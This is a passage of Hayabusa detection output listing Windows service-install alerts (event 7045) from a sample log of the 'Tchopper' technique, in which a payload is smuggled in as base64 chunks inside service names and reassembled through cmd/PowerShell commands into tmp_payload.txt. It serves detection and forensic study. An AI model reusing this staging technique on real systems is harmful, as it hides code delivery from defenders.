90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:27.853 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
